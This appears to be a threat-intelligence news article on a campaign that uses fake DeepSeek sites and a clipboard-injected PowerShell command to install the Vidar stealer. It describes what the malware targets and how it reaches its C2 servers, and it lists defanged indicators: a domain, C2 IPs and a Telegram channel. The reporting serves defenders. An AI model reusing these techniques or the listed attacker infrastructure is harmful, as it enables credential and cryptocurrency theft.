The rapid rise of generative AI tools has not only revolutionized industries but also opened new avenues for cybercriminal activities.
DeepSeek, a generative AI chatbot launched on January 20, 2025, has become the latest target for exploitation.
Threat actors are leveraging the chatbot’s popularity to deploy the Vidar information stealer malware through a series of fraudulent websites mimicking DeepSeek’s branding.
These malicious campaigns rely on brand impersonation tactics, creating fake look-alike domains to deceive users into executing harmful malware.
The attack chain begins with users being lured to counterfeit DeepSeek-themed websites, such as “deepseekcaptcha[.]top,” which prompt them to complete a fake registration process.
Victims are then redirected to a fraudulent CAPTCHA page where malicious JavaScript injects a PowerShell command into their clipboard.
If executed, this command downloads and launches the Vidar stealer malware.
Technical Breakdown of the Attack Chain
The attack is meticulously designed to exploit user trust in DeepSeek’s brand.
Once the victim executes the malicious PowerShell command, a packed Vidar executable is downloaded and run on their system.
Vidar then initiates its primary objective: harvesting sensitive data such as cryptocurrency wallet credentials, browser cookies, saved passwords, and personal files.
The malware also utilizes legitimate platforms like Telegram and Steam for command-and-control (C2) communication, further obfuscating its operations.
For instance, Vidar uses hardcoded endpoints, including a Telegram channel and Steam community profiles, to exfiltrate stolen data to attacker-controlled servers.
Targeted Data and Techniques
Vidar’s configuration in this campaign is tailored to target cryptocurrency wallets and browser-related assets.
It scans for files associated with popular wallets like MetaMask, BinanceChainWallet, and Trust Wallet, among others.
Additionally, it searches browser directories for saved credentials and autofill data from platforms like Google Chrome, Microsoft Edge, Brave Browser, and Mozilla Firefox.
The malware also employs filename-based targeting techniques, searching for files containing keywords such as wallet, seed, crypto, or password.
This approach ensures that Vidar efficiently locates and exfiltrates high-value data from infected systems.
ThreatLabz researchers have identified several IOCs associated with this campaign:
- Fake domains: deepseekcaptcha[.]top
- C2 IP addresses: 77.239.117[.]222, 95.216.178[.]57
- Telegram channel: t[.]me/b4cha00
- Packed Vidar sample hash: 9f680720826812af34cbc66e27e0281f
This campaign underscores how cybercriminals are quick to exploit emerging technologies like generative AI for malicious purposes.
The impersonation of DeepSeek highlights the risks posed by brand abuse in the digital age.
Organizations must implement robust security policies and educate users about these threats to mitigate risks effectively.
As AI adoption accelerates globally, vigilance against such sophisticated attack vectors becomes paramount.
